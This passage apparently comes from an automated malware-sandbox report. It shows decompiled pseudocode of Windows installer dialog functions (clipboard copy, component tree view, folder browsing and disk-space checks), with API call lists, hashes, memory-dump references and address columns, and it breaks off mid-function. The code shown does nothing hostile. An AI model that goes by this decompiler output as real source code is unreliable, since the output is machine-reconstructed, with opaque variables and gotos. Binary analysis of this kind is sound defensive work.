                                                                                                            • AppendMenuA.USER32 ref: 004052E1
                                                                                                            • GetWindowRect.USER32 ref: 004052F4
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405353
                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405363
                                                                                                            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
                                                                                                            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
                                                                                                            • GlobalLock.KERNEL32 ref: 0040537C
                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405390
                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004053A8
                                                                                                            • SetClipboardData.USER32 ref: 004053B3
                                                                                                            • CloseClipboard.USER32 ref: 004053B9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: {
                                                                                                            • API String ID: 590372296-366298937
                                                                                                            • Opcode ID: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                                            • Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
                                                                                                            • Opcode Fuzzy Hash: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                                            • Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00404853, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42047c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420494;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42047c = _t315;
								 *0x420494 = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420494;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420494);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					 *0x420490 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                            0x00404871
                                                                                                            0x00404877
                                                                                                            0x00404879
                                                                                                            0x0040487f
                                                                                                            0x00404885
                                                                                                            0x00404892
                                                                                                            0x0040489b
                                                                                                            0x0040489e
                                                                                                            0x004048a1
                                                                                                            0x00404ac9
                                                                                                            0x00404ad0
                                                                                                            0x00404ae4
                                                                                                            0x00404ad2
                                                                                                            0x00404ad4
                                                                                                            0x00404ad7
                                                                                                            0x00404ad8
                                                                                                            0x00404adf
                                                                                                            0x00404adf
                                                                                                            0x00404af0
                                                                                                            0x00404afe
                                                                                                            0x00404b01
                                                                                                            0x00404b17
                                                                                                            0x00404b8f
                                                                                                            0x00404b92
                                                                                                            0x00404b94
                                                                                                            0x00404b9e
                                                                                                            0x00404bac
                                                                                                            0x00404bac
                                                                                                            0x00404bae
                                                                                                            0x00404bb8
                                                                                                            0x00404bbe
                                                                                                            0x00404bdf
                                                                                                            0x00404bc0
                                                                                                            0x00404bcd
                                                                                                            0x00404bcd
                                                                                                            0x00404bbe
                                                                                                            0x00404bb8
                                                                                                            0x00000000
                                                                                                            0x00404b92
                                                                                                            0x00404b1c
                                                                                                            0x00404b27
                                                                                                            0x00404b2c
                                                                                                            0x00404b33
                                                                                                            0x00404b3a
                                                                                                            0x00404b44
                                                                                                            0x00404b44
                                                                                                            0x00404b48
                                                                                                            0x00404b4d
                                                                                                            0x00404b52
                                                                                                            0x00404b68
                                                                                                            0x00404b54
                                                                                                            0x00404b54
                                                                                                            0x00404b5c
                                                                                                            0x00404b63
                                                                                                            0x00404b5e
                                                                                                            0x00404b5e
                                                                                                            0x00404b5e
                                                                                                            0x00404b5c
                                                                                                            0x00404b6c
                                                                                                            0x00404b6e
                                                                                                            0x00404b7c
                                                                                                            0x00404b7d
                                                                                                            0x00404b89
                                                                                                            0x00404b8c
                                                                                                            0x00404b8c
                                                                                                            0x00404b4d
                                                                                                            0x00000000
                                                                                                            0x00404b3a
                                                                                                            0x00404b1e
                                                                                                            0x00404b25
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404be2
                                                                                                            0x00404be2
                                                                                                            0x00404be9
                                                                                                            0x00404c5d
                                                                                                            0x00404c64
                                                                                                            0x00404c70
                                                                                                            0x00404c70
                                                                                                            0x00404c79
                                                                                                            0x00404c7b
                                                                                                            0x00404c82
                                                                                                            0x00404c85
                                                                                                            0x00404c85
                                                                                                            0x00404c8b
                                                                                                            0x00404c92
                                                                                                            0x00404c95
                                                                                                            0x00404c95
                                                                                                            0x00404c9b
                                                                                                            0x00404ca1
                                                                                                            0x00404ca7
                                                                                                            0x00404ca7
                                                                                                            0x00404cb4
                                                                                                            0x00404e01
                                                                                                            0x00404e08
                                                                                                            0x00404e25
                                                                                                            0x00404e2b
                                                                                                            0x00404e3d
                                                                                                            0x00404e3d
                                                                                                            0x00000000
                                                                                                            0x00404cba
                                                                                                            0x00404cbc
                                                                                                            0x00404cc4
                                                                                                            0x00404cc8
                                                                                                            0x00404cc8
                                                                                                            0x00404cd0
                                                                                                            0x00404d11
                                                                                                            0x00404d13
                                                                                                            0x00404d23
                                                                                                            0x00404d26
                                                                                                            0x00404d2b
                                                                                                            0x00404d32
                                                                                                            0x00404d35
                                                                                                            0x00404dd7
                                                                                                            0x00404ddd
                                                                                                            0x00404deb
                                                                                                            0x00404dfc
                                                                                                            0x00404dfc
                                                                                                            0x00000000
                                                                                                            0x00404deb
                                                                                                            0x00404d3b
                                                                                                            0x00404d3e
                                                                                                            0x00404d44
                                                                                                            0x00404d49
                                                                                                            0x00404d4b
                                                                                                            0x00404d4d
                                                                                                            0x00404d53
                                                                                                            0x00404d5a
                                                                                                            0x00404d5f
                                                                                                            0x00404d66
                                                                                                            0x00404d69
                                                                                                            0x00404d69
                                                                                                            0x00404d70
                                                                                                            0x00404d7c
                                                                                                            0x00404d80
                                                                                                            0x00404d82
                                                                                                            0x00404d82
                                                                                                            0x00404d72
                                                                                                            0x00404d74
                                                                                                            0x00404d74
                                                                                                            0x00404da2
                                                                                                            0x00404dae
                                                                                                            0x00404dbd
                                                                                                            0x00404dbd
                                                                                                            0x00404dbf
                                                                                                            0x00404dc2
                                                                                                            0x00404dcb
                                                                                                            0x00000000
                                                                                                            0x00404cd2
                                                                                                            0x00404cdd
                                                                                                            0x00404ce0
                                                                                                            0x00404ce5
                                                                                                            0x00404ce7
                                                                                                            0x00404ceb
                                                                                                            0x00404cfb
                                                                                                            0x00404d05
                                                                                                            0x00404d07
                                                                                                            0x00404d0a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404ced
                                                                                                            0x00404ced
                                                                                                            0x00404cf3
                                                                                                            0x00404cf5
                                                                                                            0x00404cf5
                                                                                                            0x00404cf6
                                                                                                            0x00404cf7
                                                                                                            0x00000000
                                                                                                            0x00404ced
                                                                                                            0x00404cd0
                                                                                                            0x00404cb4
                                                                                                            0x00404bf1
                                                                                                            0x00000000
                                                                                                            0x00404c07
                                                                                                            0x00404c11
                                                                                                            0x00404c16
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404c28
                                                                                                            0x00404c2d
                                                                                                            0x00404c39
                                                                                                            0x00404c39
                                                                                                            0x00404c3b
                                                                                                            0x00404c4a
                                                                                                            0x00404c4c
                                                                                                            0x00404c53
                                                                                                            0x00404c56
                                                                                                            0x00000000
                                                                                                            0x00404c56
                                                                                                            0x00404bf1
                                                                                                            0x004048a7
                                                                                                            0x004048ac
                                                                                                            0x004048b6
                                                                                                            0x004048b7
                                                                                                            0x004048c0
                                                                                                            0x004048cb
                                                                                                            0x004048d6
                                                                                                            0x004048dc
                                                                                                            0x004048ea
                                                                                                            0x004048ff
                                                                                                            0x00404904
                                                                                                            0x0040490f
                                                                                                            0x00404918
                                                                                                            0x0040492d
                                                                                                            0x0040493e
                                                                                                            0x0040494b
                                                                                                            0x0040494b
                                                                                                            0x00404950
                                                                                                            0x00404956
                                                                                                            0x00404958
                                                                                                            0x0040495b
                                                                                                            0x00404960
                                                                                                            0x00404965
                                                                                                            0x00404967
                                                                                                            0x00404967
                                                                                                            0x00404987
                                                                                                            0x00404987
                                                                                                            0x00404989
                                                                                                            0x0040498a
                                                                                                            0x0040498f
                                                                                                            0x00404992
                                                                                                            0x00404995
                                                                                                            0x00404999
                                                                                                            0x0040499e
                                                                                                            0x004049a3
                                                                                                            0x004049a7
                                                                                                            0x004049ac
                                                                                                            0x004049b1
                                                                                                            0x004049b3
                                                                                                            0x004049bb
                                                                                                            0x00404a85
                                                                                                            0x00404a98
                                                                                                            0x00000000
                                                                                                            0x004049c1
                                                                                                            0x004049c4
                                                                                                            0x004049c7
                                                                                                            0x004049ca
                                                                                                            0x004049ca
                                                                                                            0x004049d0
                                                                                                            0x004049d6
                                                                                                            0x004049d9
                                                                                                            0x004049df
                                                                                                            0x004049e0
                                                                                                            0x004049e5
                                                                                                            0x004049ee
                                                                                                            0x004049f5
                                                                                                            0x004049f8
                                                                                                            0x004049fb
                                                                                                            0x004049fe
                                                                                                            0x00404a3a
                                                                                                            0x00404a63
                                                                                                            0x00404a3c
                                                                                                            0x00404a49
                                                                                                            0x00404a49
                                                                                                            0x00404a00
                                                                                                            0x00404a03
                                                                                                            0x00404a12
                                                                                                            0x00404a1c
                                                                                                            0x00404a24
                                                                                                            0x00404a2b
                                                                                                            0x00404a33
                                                                                                            0x00404a33
                                                                                                            0x004049fe
                                                                                                            0x00404a69
                                                                                                            0x00404a6a
                                                                                                            0x00404a76
                                                                                                            0x00404a76
                                                                                                            0x00404a83
                                                                                                            0x00404a9e
                                                                                                            0x00404aa2
                                                                                                            0x00404abf
                                                                                                            0x00404ac4
                                                                                                            0x00404ac7
                                                                                                            0x00000000
                                                                                                            0x00404aa4
                                                                                                            0x00404aa9
                                                                                                            0x00404ab2
                                                                                                            0x00404e3f
                                                                                                            0x00404e51
                                                                                                            0x00404e51
                                                                                                            0x00404aa2
                                                                                                            0x00000000
                                                                                                            0x00404a83
                                                                                                            0x004049bb

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 0040486A
                                                                                                            • GetDlgItem.USER32 ref: 00404877
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004048C3
                                                                                                            • LoadBitmapA.USER32 ref: 004048D6
                                                                                                            • SetWindowLongA.USER32 ref: 004048F0
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404918
                                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 0040492D
                                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404939
                                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040494B
                                                                                                            • DeleteObject.GDI32(?), ref: 00404950
                                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040497B
                                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404987
                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A1C
                                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A47
                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A5B
                                                                                                            • GetWindowLongA.USER32 ref: 00404A8A
                                                                                                            • SetWindowLongA.USER32 ref: 00404A98
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404AA9
                                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BAC
                                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C11
                                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C26
                                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C4A
                                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C70
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404C85
                                                                                                            • GlobalFree.KERNEL32 ref: 00404C95
                                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D05
                                                                                                            • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404DAE
                                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DBD
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404E2B
                                                                                                            • GetDlgItem.USER32 ref: 00404E36
                                                                                                            • ShowWindow.USER32(00000000), ref: 00404E3D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                                            • Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
                                                                                                            • Opcode Fuzzy Hash: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                                            • Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00404356, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t162);
					E00405DC8(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t162);
							if(E0040573A(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t162);
							_t145 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t162);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004056A0(0x41f468) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004047A6(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f458);
									} else {
										E004046F1(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403F3A(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x42048c == _t145) {
									E004042EB();
								}
								 *0x42048c = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t162;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t162, 0x41f870, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405659(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00405B88(0x3fb, 0x4204a0, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x4204a0) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004056C6(_t162) != 0 && E004056ED(_t162) == 0) {
						E00405659(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
